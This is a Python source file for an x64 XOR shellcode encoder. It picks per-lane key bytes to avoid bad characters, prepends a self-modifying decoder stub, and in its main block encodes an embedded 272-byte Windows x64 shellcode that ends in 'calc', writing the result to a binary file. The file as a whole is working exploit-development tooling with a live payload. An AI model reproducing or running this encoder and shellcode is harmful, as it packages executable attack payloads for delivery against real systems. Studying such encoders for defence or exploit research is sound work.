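#!/usr/bin/env python3
# filename: xor_qword_x64.py
# coding=utf-8
"""x64 QWORD XOR encoder (Python 3).

Takes a byte buffer, XORs it with an 8-byte key and prepends a fixed 39-byte
x64 decoder stub. One key byte is picked per byte lane (offset modulo 8) so
that no encoded byte equals a caller-supplied "bad character".

Apart from the 4-byte block count and the 8-byte key, every byte of the stub
is constant, and the stub rewrites the memory directly behind itself before
running it; both properties are visible in ``decoder_stub`` below.
"""
import random
import re
import struct
import sys

# Length of the decoder stub; also the displacement used by its xor instruction.
_STUB_LENGTH = 0x27
# Eight-byte marker in the stub that do_encode() swaps for the real key.
_KEY_PLACEHOLDER = b"XXXXXXXX"

_STUB_CONFLICT = (
    "\n[Error] Encoder Error: bad character specified is used for the decoder stub.",
    "[Error] Encoder Error: please use different bad characters or another encoder!",
)
_NO_KEY = (
    "\n[Error] Encoder Error: can't find available keys.",
    "[Error] Encoder Error: please use different bad characters or another encoder!",
)
_INVALID_BAD_CHAR = (
    "\n[Error] Bad Character Error: invalid bad character detected.",
    "[Error] Bad Character Error: please provide bad characters in \\x00\\x01... format.",
)
_NO_INPUT = (
    "\n[Error] Encoder Error: no shellcode has been set.",
)


def _abort(lines):
    """Print every message line, then exit with a non-zero status."""
    for line in lines:
        print(line)
    sys.exit(1)


class Qwordxorencoder:
    """Encode a byte buffer with a per-lane 8-byte XOR key and a decoder stub.

    Typical order of calls: ``set_shellcode``, ``set_bad_characters``,
    ``encode``, then ``all_the_stats`` / ``shellcode_to_bin``.
    Validation failures print a message and raise ``SystemExit``.
    """

    def __init__(self):
        self.name = "x64 QWORD xor Encoder"
        self.description = "x64 QWORD xor Shellcode Encoder"
        self.author = "Danny__wei"
        self.bad_chars = []                       # byte values (ints) to avoid
        self.bad_keys = [[] for _ in range(8)]    # per lane: unusable key bytes
        self.good_keys = [[] for _ in range(8)]   # per lane: usable key bytes
        self.final_keys = []                      # chosen key, one byte per lane
        self.shellcode = bytearray()
        self.encoded_shellcode = bytearray()
        self.encoded_payload_length = 0
        # Byte values that occur in the fixed part of the decoder stub, as
        # two-digit lowercase hex. A requested bad character that matches one
        # of them cannot be honoured.
        # NOTE(review): several entries were unreadable on the page and were
        # re-derived from the stub bytes in decoder_stub(); "ef" (part of the
        # lea displacement) is included because the stub contains it.
        self.encoder_bad_chars = [
            "48", "31", "c9", "81", "e9", "8d", "05", "ef", "bb", "58",
            "27", "2d", "f8", "ff", "e2", "f4",
        ]
        self.misc_comments = r"""
            #This is the decoder stub
            "\x48\x31\xc9" +                  # xor rcx, rcx
            "\x48\x81\xe9" + block_count +    # sub ecx, block_count
            "\x48\x8d\x05\xef\xff\xff\xff" +  # lea rax, [rel 0x0]
            "\x48\xbbXXXXXXXX" +              # mov rbx, 0x????????????????
            "\x48\x31\x58\x27" +              # xor [rax+0x27], rbx
            "\x48\x2d\xf8\xff\xff\xff" +      # sub rax, -8
            "\xe2\xf4"                        # loop 0x1B
        """

    def all_the_stats(self):
        """Print the encoder name, bad characters, output length and key."""
        print("\n[Output] Encoder Name:\n" + self.name)
        listed = "".join(hex(value) + " " for value in self.bad_chars)
        print("\n[Output] Bad Character(s):\n" + listed)
        print("\n[Output] Shellcode length:\n" + str(self.encoded_payload_length))
        # final_keys[0] is the lowest-addressed byte, i.e. the least
        # significant byte of the little-endian qword loaded into rbx.
        key = 0
        for position, key_byte in enumerate(self.final_keys):
            key += key_byte << (8 * position)
        # 16 hex digits: the key is 64 bits wide, leading zero bytes included.
        print("\n[Output] Xor Key:\n%016x" % key)

    def shellcode_to_bin(self):
        """Write the encoded buffer to ``xor_x64_encoded.bin`` in the cwd."""
        with open("xor_x64_encoded.bin", "wb") as handle:
            handle.write(self.encoded_shellcode)

    def set_shellcode(self, shellcode):
        """Store the input buffer.

        ``bytes``/``bytearray`` are taken verbatim. A text ``str`` is treated
        as Latin-1 and backslash escapes such as ``\\x41`` are expanded.
        """
        if isinstance(shellcode, (bytes, bytearray)):
            raw = bytes(shellcode)
        else:
            raw = (
                shellcode.encode("latin-1")
                .decode("unicode_escape")
                .encode("latin-1")
            )
        self.shellcode = bytearray(raw)

    # This function is copied from Justin Warner (@sixdub)
    def set_bad_characters(self, bad_characters):
        """Parse and record the byte values that must not appear in the output.

        Accepts ``x00x0a`` as well as ``\\x00\\x0a``. Exits when an entry is
        not a two-digit hex byte or collides with a byte of the decoder stub.
        """
        # Regex credited to Rohan (@cptjesus) in the original source.
        hex_byte = re.compile(r"[a-f0-9]{2}", flags=re.IGNORECASE)
        accepted = []
        # Backslashes are dropped first so that the format named in the error
        # message is really accepted.
        for item in bad_characters.replace("\\", "").split("x"):
            if item == "":
                continue
            # Compare case-insensitively: the stub list is lowercase.
            if item.lower() in self.encoder_bad_chars:
                _abort(_STUB_CONFLICT)
            if not hex_byte.fullmatch(item):
                _abort(_INVALID_BAD_CHAR)
            accepted.append(int(item, 16))
        self.bad_chars.extend(accepted)

    def find_bad_keys(self):
        """For each of the 8 lanes, list the key bytes that cannot be used.

        A key byte is unusable in a lane when XORing it with some input byte
        of that lane yields a bad character, or when the key byte itself is a
        bad character (the key is embedded verbatim in the stub).
        """
        self.bad_keys = [[] for _ in range(8)]
        for lane in range(8):
            lane_bytes = set(self.shellcode[lane::8])
            for key in range(0x100):
                if key in self.bad_chars or any(
                    (key ^ bad) in lane_bytes for bad in self.bad_chars
                ):
                    self.bad_keys[lane].append(key)

    def find_key(self):
        """Pick one usable key byte per lane at random; exit if a lane has none."""
        self.good_keys = [
            [key for key in range(0x100) if key not in self.bad_keys[lane]]
            for lane in range(8)
        ]
        self.final_keys = []
        for lane in range(8):
            if not self.good_keys[lane]:
                _abort(_NO_KEY)
            # random.choice cannot index past the end, unlike
            # randint(0, len(...)) whose upper bound is inclusive.
            self.final_keys.append(random.choice(self.good_keys[lane]))

    def decoder_stub(self):
        """Return the 39-byte stub with the block count filled in.

        The key is still the ``XXXXXXXX`` placeholder; do_encode() replaces it.
        """
        # Negative number of 8-byte blocks, rounded up; "sub rcx, -n" leaves
        # rcx = n as the loop counter.
        block_count = -(((len(self.shellcode) - 1) // 8) + 1)
        packed_count = struct.pack("<l", block_count)
        return (
            b"\x48\x31\xc9"                        # xor rcx, rcx
            + b"\x48\x81\xe9" + packed_count       # sub rcx, block_count
            + b"\x48\x8d\x05\xef\xff\xff\xff"      # lea rax, [rip-0x11] (stub start)
            + b"\x48\xbb" + _KEY_PLACEHOLDER       # mov rbx, <8-byte key>
            + b"\x48\x31\x58\x27"                  # xor [rax+0x27], rbx
            + b"\x48\x2d\xf8\xff\xff\xff"          # sub rax, -8
            + b"\xe2\xf4"                          # loop back to the xor (offset 0x1b)
        )

    def do_encode(self):
        """Build stub + XOR-encoded input and store it on the instance."""
        key_bytes = bytes(bytearray(self.final_keys))
        stub = self.decoder_stub().replace(_KEY_PLACEHOLDER, key_bytes)
        # The block count and the key are the variable parts of the stub and
        # may still collide with a requested bad character.
        if any(value in self.bad_chars for value in bytearray(stub)):
            _abort(_STUB_CONFLICT)
        # NOTE(review): the input is not padded to a multiple of 8 although the
        # stub works on whole qwords, so for other lengths the last xor also
        # touches up to 7 bytes that follow the encoded buffer.
        encoded = bytearray(stub)
        for offset, value in enumerate(bytearray(self.shellcode)):
            encoded.append(value ^ self.final_keys[offset % 8])
        self.encoded_shellcode = encoded
        self.encoded_payload_length = len(encoded)

    def encode(self):
        """Run key selection and encoding on the stored input."""
        if not self.shellcode:
            # An empty input would give a block count of zero.
            _abort(_NO_INPUT)
        self.find_bad_keys()
        self.find_key()
        self.do_encode()


if __name__ == "__main__":
    # Sample input exactly as listed on the page (272 bytes); its last five
    # bytes are the ASCII string "calc" followed by a NUL.
    shellcode = (
        b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51"
        b"\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52"
        b"\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0"
        b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed"
        b"\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88"
        b"\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44"
        b"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
        b"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1"
        b"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
        b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49"
        b"\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a"
        b"\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
        b"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"
        b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
        b"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
        b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47"
        b"\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x00"
    )
    shell = Qwordxorencoder()
    shell.set_shellcode(shellcode)
    shell.set_bad_characters("x00x0a")
    shell.encode()
    shell.all_the_stats()
    shell.shellcode_to_bin()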
x64 QWORD Xor Shellcode Encoder